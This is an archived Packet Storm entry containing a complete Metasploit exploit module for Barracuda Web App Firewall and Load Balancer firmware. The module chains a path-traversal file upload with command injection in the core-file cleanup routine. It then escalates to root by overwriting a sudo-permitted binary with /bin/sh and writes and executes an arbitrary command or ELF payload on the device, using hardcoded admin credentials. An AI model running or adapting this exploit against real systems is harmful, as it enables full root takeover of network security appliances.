Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)

2016-07-26T00:00:00
ID PACKETSTORM:138057
Type packetstorm
Reporter Russell Sanford
Modified 2016-07-26T00:00:00

Description

                                        
                                            `# Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)  
# Date: 07/25/16  
# Exploit Author: xort xort@blacksecurity.org  
# Vendor Homepage: https://www.barracuda.com/  
# Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall  
# Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= v8.0.1.007 (2016-01-07)  
# Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07)  
# CVE : None.  
  
# This exploit combines 2 bugs to leverage root access  
# Vuln 1: ondefined_view_template trigger - File upload vuln  
# Vuln 2: ondefined_remove_corefiles trigger - Command injection vuln (from loaded file data)  
  
require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
include Exploit::Remote::Tcp  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit (2)',  
'Description' => %q{  
This module exploits a remote command execution vulnerability in  
the Barracuda Web App Firewall Firmware Version <= 8.0.1.007 and Load Balancer Firmware <= v5.4.0.004  
by exploiting a two vulnerabilities in the web administration interface. The first bug leverages a Arbitrary File  
Upload vulnerability to create a malicious file containing shell commands before using a second bug meant to clean  
up left-over core files on the device to execute them. By sending a specially crafted requests  
it's possible to inject system commands while escalating to root do to relaxed sudo configurations on the applianaces.  
},  
  
'Author' =>  
[  
'xort', # vuln + metasploit module  
],  
'Version' => '$Revision: 2 $',  
'References' =>  
[  
[ 'none', 'none'],  
],  
'Platform' => [ 'linux'],  
'Privileged' => true,  
'Arch' => [ ARCH_X86 ],  
'SessionTypes' => [ 'shell' ],  
'Privileged' => false,  
  
'Payload' =>  
{   
'Compat' =>  
{  
'ConnectionType' => 'find',  
}  
},  
  
'Targets' =>  
[  
['Barracuda Web App Firewall Firmware Version <= 8.0.1.007 (2016-01-07)',  
{  
'Arch' => ARCH_X86,  
'Platform' => 'linux',  
'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"  
}  
],  
  
['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)',  
{  
'Arch' => ARCH_X86,  
'Platform' => 'linux',  
'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd"  
}  
],  
],  
  
'DefaultTarget' => 0))  
  
register_options(  
[  
OptString.new('PASSWORD', [ false, 'Device password', "" ]),   
OptString.new('ET', [ false, 'Device password', "" ]),  
OptString.new('USERNAME', [ true, 'Device password', "admin" ]),   
OptString.new('CMD', [ false, 'Command to execute', "" ]),   
Opt::RPORT(8000),  
], self.class)  
end  
  
def do_login(username, password_clear, et)  
vprint_status( "Logging into machine with credentials...\n" )  
  
# vars  
timeout = 1550;  
enc_key = Rex::Text.rand_text_hex(32)  
  
# send request   
res = send_request_cgi(  
{  
'method' => 'POST',  
'uri' => "/cgi-mod/index.cgi",  
'headers' =>   
{  
'Accept' => "application/json, text/javascript, */*; q=0.01",  
'Content-Type' => "application/x-www-form-urlencoded",  
'X-Requested-With' => "XMLHttpRequest"  
},  
'vars_post' =>  
{  
  
'enc_key' => enc_key,  
'et' => et,  
'user' => "admin", # username,  
'password' => "admin", # password_clear,  
'enctype' => "none",  
'password_entry' => "",  
'login_page' => "1",  
'login_state' => "out",  
'real_user' => "",  
'locale' => "en_US",  
'form' => "f",  
'Submit' => "Sign in",  
}  
}, timeout)  
  
# get rid of first yank   
password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result  
et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]  
  
return password, et  
end  
  
def run_command(username, password, et, cmd)  
vprint_status( "Running Command...\n" )  
  
# file to overwrite  
cmd_file = "/home/product/code/config/corefile_list.txt"  
  
# file to replace  
sudo_cmd_exec = target['SudoCmdExec']  
  
sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"  
sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "  
  
# random filename to dump too + 'tmp' HAS to be here.  
b64dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))  
  
# decoder stubs - tells 'base64' command to decode and dump data to temp file  
b64decode1 = "echo \""  
b64decode2 = "\" | base64 -d >" + b64dumpfile  
  
# base64 - encode with base64 so we can send special chars and multiple lines  
cmd = Base64.strict_encode64(cmd)  
  
# Create injection string.  
# a) package the base64 decoder with encoded bytes  
# b) attach a chmod +x request to make the script created (b64dumpfile) executable  
# c) execute decoded base64 dumpfile  
  
injection_string = b64decode1 + cmd + b64decode2 + "; /bin/chmod +x " + b64dumpfile + "; " + sudo_run_cmd_1 + "; " + sudo_run_cmd_2 + b64dumpfile + " ; rm " + b64dumpfile  
  
exploitreq = [  
[ "auth_type","Local" ],  
[ "et",et ],  
[ "locale","en_US" ],  
[ "password", password ],  
[ "primary_tab", "BASIC" ],  
[ "realm","" ],  
[ "secondary_tab","reports" ],  
[ "user", username ],  
[ "timestamp", Time.now.to_i ],  
  
[ "upload_template_file_filename", "admin" ]  
]  
  
  
boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)  
post_data = ""  
  
exploitreq.each do |xreq|  
post_data << "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"  
post_data << "#{xreq[1]}\r\n"  
end  
  
# upload file  
up_filename = cmd_file  
post_data << "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"upload_template_file\"; filename=\"../#{up_filename}\"\r\n\r\n"  
post_data << ";#{injection_string};\r\n"  
  
# end data  
post_data << "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"view_template\"\r\n\r\n"  
post_data << "\r\n"  
  
post_data << "--#{boundary}--\r\n" # end boundary  
  
# upload file vuln  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => "/cgi-mod/index.cgi",  
'ctype' => "multipart/form-data; boundary=#{boundary}",  
'data' => post_data,  
'headers' =>   
{  
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",  
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",  
'Accept-Language' => "en-US,en;q=0.5"  
}  
})   
  
post_data = ""  
  
exploitreq.each do |xreq|  
post_data << "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"  
post_data << "#{xreq[1]}\r\n"  
end  
  
# triger vuln   
post_data << "--#{boundary}\r\n"  
post_data << "Content-Disposition: form-data; name=\"remove_corefiles\"\r\n\r\n"  
post_data << "\r\n"  
  
post_data << "--#{boundary}--\r\n" # end boundary  
  
# upload file vuln  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => "/cgi-mod/index.cgi",  
'ctype' => "multipart/form-data; boundary=#{boundary}",  
'data' => post_data,  
'headers' =>  
{  
'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",  
'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",  
'Accept-Language' => "en-US,en;q=0.5"  
}  
})  
  
  
  
end  
  
def run_script(username, password, et, cmds)  
vprint_status( "running script...\n")  
  
  
end  
  
def exploit  
# timeout  
timeout = 1550;  
  
user = "admin"  
  
# params  
real_user = "";  
login_state = "out"  
et = Time.now.to_i  
locale = "en_US"  
user = "admin"  
password = "admin"  
enctype = "MD5"  
password_entry = ""  
password_clear = "admin"  
  
  
password_hash, et = do_login(user, password_clear, et)  
vprint_status("new password: #{password_hash} et: #{et}\n")  
  
sleep(5)  
  
  
#if no 'CMD' string - add code for root shell  
if not datastore['CMD'].nil? and not datastore['CMD'].empty?  
  
cmd = datastore['CMD']  
  
# Encode cmd payload  
encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')  
  
# kill stale calls to bdump from previous exploit calls for re-use  
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))  
else  
# Encode payload to ELF file for deployment  
elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)  
encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')  
  
# kill stale calls to bdump from previous exploit calls for re-use  
run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))  
  
handler  
end  
  
  
end  
  
end  
`